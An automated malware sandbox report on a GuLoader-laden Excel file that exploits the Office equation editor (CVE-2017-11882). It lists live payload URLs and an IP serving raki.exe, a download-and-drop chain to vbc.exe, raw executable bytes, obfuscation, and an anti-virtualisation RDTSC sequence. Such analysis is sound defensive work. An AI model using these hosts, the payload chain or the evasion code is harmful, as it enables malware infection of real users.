Windows Analysis Report
listing new.xlsx

Overview

General Information

Sample Name:	listing new.xlsx
Analysis ID:	557639
MD5:	4aae6390327810b9cb4055320ea85c31
SHA1:	aec6f3bfebe0e92c2d9d16c2fc50e7ab06349a8a
SHA256:	7830f70d3c66ebdb8bcd854c46efd02c4689fd952f0f701029b14c2c37ee1bc0
Tags:	VelvetSweatshopxlsx
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to dynamically determine API calls

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection

Found malware configuration

Source: 00000004.00000002.678614834.0000000003750000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://dariamob.ro/wed/eee_XScUCMEVL"}

Multi AV Scanner detection for submitted file

Source: listing new.xlsx	Virustotal: Detection: 37%			Perma Link
Source: listing new.xlsx	ReversingLabs: Detection: 34%

Antivirus detection for URL or domain

Source: http://50.16.4.125/E/raki.exe

Avira URL Cloud: Label: malware

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406873 FindFirstFileW,FindClose,	4_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Software Vulnerabilities

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 50.16.4.125:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 50.16.4.125:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 52MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://dariamob.ro/wed/eee_XScUCMEVL

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AMAZON-AESUS AMAZON-AESUS

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Jan 2022 11:37:30 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.14Last-Modified: Thu, 20 Jan 2022 12:11:37 GMTETag: "236f8-5d6026772cefd"Accept-Ranges: bytesContent-Length: 145144Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 d4 7d 02 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 b0 0d 00 00 00 00 00 00 00 00 00 00 88 22 02 00 70 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 b0 0d 00 00 00 c0 04 00 00 0e 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /E/raki.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 50.16.4.125Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125

Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.676925104.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.463627479.000000000040A000.00000008.00020000.sdmp, vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: vbc.exe, 00000004.00000002.677115561.0000000001DB0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.677115561.0000000001DB0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000004.00000002.678391838.0000000003457000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CED38AF1.emf

Jump to behavior

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_004056DE

System Summary

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

4_2_0040352D

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040755C	4_2_0040755C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406D85	4_2_00406D85
Source: C:\Users\Public\vbc.exe	Code function: 4_2_729A1BFF	4_2_729A1BFF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03755F78	4_2_03755F78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757148	4_2_03757148
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375452E	4_2_0375452E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375490A	4_2_0375490A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037541E4	4_2_037541E4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037507E3	4_2_037507E3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037551C4	4_2_037551C4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03755DB5	4_2_03755DB5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03754FBC	4_2_03754FBC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375599B	4_2_0375599B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375567B	4_2_0375567B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757A67	4_2_03757A67
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375466B	4_2_0375466B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757652	4_2_03757652
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03755E4E	4_2_03755E4E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03757E25	4_2_03757E25
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03756E15	4_2_03756E15
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037580D9	4_2_037580D9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03756CCB	4_2_03756CCB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0375629E	4_2_0375629E

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: listing new.xlsx	Virustotal: Detection: 37%
Source: listing new.xlsx	ReversingLabs: Detection: 34%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0040352D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$listing new.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE926.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/21@0/1

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004021AA CoCreateInstance,

4_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

4_2_0040498A

Source: vbc.exe, 00000004.00000002.678201321.0000000003270000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.678614834.0000000003750000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_729A30C0 push eax; ret	4_2_729A30EE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03750353 push 92DC45CCh; ret	4_2_03750352
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03750542 pushad ; retf	4_2_03750546
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03752B48 push ebx; retf	4_2_03752B49
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03754115 push cs; ret	4_2_03754124
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03754115 push ebx; iretd	4_2_037541E3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037541A1 push ebx; iretd	4_2_037541E3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03750798 push esp; ret	4_2_037507AE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03751986 push ebx; iretd	4_2_0375198B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03753070 push 8175DDB0h; ret	4_2_03753076
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03754047 push ebp; iretd	4_2_03754053
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03753029 push ebx; ret	4_2_0375303D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03750C10 pushfd ; retf	4_2_03750C11
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03750219 push 92DC45CCh; ret	4_2_03750352
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03752807 push esp; retf	4_2_03752810
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037502F7 push 92DC45CCh; ret	4_2_03750352
Source: C:\Users\Public\vbc.exe	Code function: 4_2_037506D7 push edx; ret	4_2_037506D8

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_729A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_729A1BFF

Persistence and Installation Behavior

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsj734E.tmp\System.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 0000000003757598 second address: 0000000003757598 instructions: 0x00000000 rdtsc 0x00000002 mov eax, E840912Fh 0x00000007 xor eax, 7A8A25B6h 0x0000000c xor eax, E8404D81h 0x00000011 xor eax, 7A8AF919h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F7440E86D88h 0x0000001e lfence 0x00000021 mov edx, 2E6725F1h 0x00000026 add edx, 02DF62A2h 0x0000002c xor edx, 717DB16Fh 0x00000032 xor edx, 3FC539E8h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test al, al 0x0000003f cmp si, 2DCDh 0x00000044 test edx, edx 0x00000046 test al, 03h 0x00000048 ret 0x00000049 sub edx, esi 0x0000004b ret 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F7440E86D68h 0x0000005d test edx, edx 0x0000005f cmp ah, ch 0x00000061 call 00007F7440E86DCAh 0x00000066 call 00007F7440E86DA9h 0x0000006b lfence 0x0000006e mov edx, 2E6725F1h 0x00000073 add edx, 02DF62A2h 0x00000079 xor edx, 717DB16Fh 0x0000007f xor edx, 3FC539E8h 0x00000085 mov edx, dword ptr [edx] 0x00000087 lfence 0x0000008a test al, al 0x0000008c cmp si, 2DCDh 0x00000091 test edx, edx 0x00000093 test al, 03h 0x00000095 ret 0x00000096 